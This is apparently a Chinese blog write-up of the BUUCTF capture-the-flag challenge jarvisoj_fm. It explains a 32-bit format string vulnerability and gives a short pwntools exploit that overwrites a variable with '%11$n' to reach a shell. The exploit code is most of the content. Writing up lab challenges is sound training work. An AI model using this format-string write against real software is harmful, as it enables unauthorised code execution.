Featured image of post BUUCTF-jarvisoj_fm 题解

BUUCTF-jarvisoj_fm 题解

|

题目

题目链接

checksec

这是什么鸭

IDA

这是什么鸭

利用格式化字符串漏洞篡改 x 为 4 即可,注意这里是 32 位

exp

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
from pwn import *

context.log_level = 'debug'
context.arch = 'i386'

p = process('./fm')

x_addr = p32(0x804A02C)
payload = x_addr + b'%11$n'
p.sendline(payload)

p.interactive()
本博客已稳定运行
发表了40篇文章 · 总计96383字
使用 Hugo 构建
主题 Stack 设计自 Jimmy